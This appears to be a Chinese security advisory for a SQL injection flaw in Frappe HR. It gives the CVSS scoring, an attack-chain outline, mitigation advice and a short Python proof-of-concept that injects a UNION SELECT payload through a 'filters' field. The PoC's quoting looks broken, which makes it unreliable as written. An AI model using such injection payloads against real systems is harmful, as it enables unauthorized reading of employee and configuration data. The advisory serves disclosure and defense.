CVE-2026-41320 CVSS 6.5 中危

CVE-2026-41320 Frappe HR SQL注入漏洞

披露日期: 2026-04-21

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-41320

漏洞类型

SQL注入

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Frappe HR

漏洞概述

Frappe HR是一款开源的人力资源管理解决方案。在15.54.0和14.38.1版本之前，攻击者可以向特定端点发送精心构造的请求，触发SQL注入漏洞。该漏洞允许攻击者提取本无法访问的敏感信息。官方已在后续版本中修复此问题，目前暂无已知的临时绕过方法。

技术细节

该漏洞源于Frappe HR在处理特定端点的请求时，未能对用户输入进行充分的过滤或参数化处理，导致攻击者可以将恶意的SQL语句注入到后端数据库查询中。根据CVSS向量分析，该漏洞利用复杂度低（AC:L），无需用户交互（UI:N），且攻击者仅需低权限（PR:L）即可通过网络（AV:N）发起攻击。成功的利用将直接影响数据的机密性（C:H），攻击者可以利用UNION SELECT等SQL语句技术读取数据库中的敏感数据，如员工信息或系统配置，但不会影响数据的完整性和可用性。

攻击链分析

STEP 1

侦察

攻击者识别出运行Frappe HR的目标系统，并确认其版本低于15.54.0或14.38.1。

STEP 2

获取访问权限

攻击者注册或获取一个低权限账户，满足PR:L（低权限）的利用条件。

STEP 3

漏洞利用

攻击者向存在漏洞的特定端点发送包含恶意SQL注入Payload的特制HTTP请求。

STEP 4

数据窃取

后端数据库执行恶意SQL语句，将查询结果（如敏感数据或数据库版本）返回给攻击者。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-41320: SQL Injection in Frappe HR
import requests

target_url = "http://target-domain/api/resource/endpoint"  # Replace with actual vulnerable endpoint
headers = {
    "Authorization": "token <low_privilege_token>",
    "Content-Type": "application/json"
}

# Malicious payload to extract database version
# The payload structure depends on the specific endpoint parameter vulnerable
payload = {
    "filters": "[[\"name\",\"=\",\"1' UNION SELECT 1,2,version(),4-- "]]"
}

try:
    response = requests.post(target_url, json=payload, headers=headers, timeout=10)
    if response.status_code == 200:
        print("[+] Potential SQL Injection successful.")
        print("[+] Response:")
        print(response.text)
    else:
        print("[-] Request failed with status code:", response.status_code)
except Exception as e:
    print(f"[-] An error occurred: {e}")

影响范围

Frappe HR < 15.54.0

Frappe HR < 14.38.1

防御指南

临时缓解措施

由于官方未提供临时解决方案，建议立即将系统升级至修复版本。如果无法立即升级，应严格限制对受影响端点的网络访问，仅允许受信任的IP地址访问，并加强对数据库异常查询日志的监控。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表